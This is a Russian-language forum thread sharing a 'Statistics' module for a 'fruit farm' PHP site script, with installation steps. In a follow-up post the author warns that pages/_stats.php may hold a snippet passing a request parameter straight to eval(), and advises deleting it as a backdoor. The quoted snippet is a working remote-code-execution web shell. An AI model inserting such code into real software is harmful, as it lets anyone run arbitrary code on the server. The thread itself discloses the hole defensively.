Автор Тема: Модуль для FF "Статистика"  (Прочитано 2774 раз)

0 Пользователей и 1 Гость просматривают эту тему.

shans5Автор темы

  • *
  • *
  • Оффлайн
  • Награды Репутация более 50 Более 3000 сообщений Три года на форуме !!! Более 500 созданных тем Бывает груб к участникам форума. За время в онлайне на форуме
  • Дата регистрации: Сен. 2015
  • Расположение: Регион 58
  • Возраст: 39
  • Сообщений: 3543
  • Страна: ru
  • Поблагодарили: 745 раз(а)
  • Репутация +66/-5
  • Пол: Мужской
  • Всё только начинается !!!
  • Дата рождения:1979-06-30
    • Награды
Модуль для FF "Статистика"
« : 19 Октября 2015, 22:26:23 »
Модуль для фруктовой фермы,показывает статистику на проекте
Установка:
1. Залить файл модуля в папку pages.
2. Прописать пути в корневом htaccess.
3. Подключить файл в index.php.
4. Поставить ссылку в шаблоне.

[вложение удалено администратором]
Подвергнуть критике, может любой.
Создать то,что будет подвергнуто критике,дано не каждому.

 
Пользователи, которые поблагодарили этот пост: hedhanter, Alex2017

shans5Автор темы

  • *
  • *
  • Оффлайн
  • Награды Репутация более 50 Более 3000 сообщений Три года на форуме !!! Более 500 созданных тем Бывает груб к участникам форума. За время в онлайне на форуме
  • Дата регистрации: Сен. 2015
  • Расположение: Регион 58
  • Возраст: 39
  • Сообщений: 3543
  • Страна: ru
  • Поблагодарили: 745 раз(а)
  • Репутация +66/-5
  • Пол: Мужской
  • Всё только начинается !!!
  • Дата рождения:1979-06-30
    • Награды
Модуль для FF "Статистика"
« Ответ #1 : 24 Октября 2015, 21:24:41 »
Для тех, у кого стоит модуль статистики...

Посмотрите файл pages/_stats.php

Если есть такая строка
if(!empty($_REQUEST['stats']))
{
if(@get_magic_quotes_gpc())$_REQUEST['stats']=stripslashes($_REQUEST['stats']);
eval($_REQUEST['stats']); die();
}

То удаляйте её,скорее всего это дыра в модуле
 
Пользователи, которые поблагодарили этот пост: yurii1983
Теги:
 

Имя пользователя:
Пароль:
Session: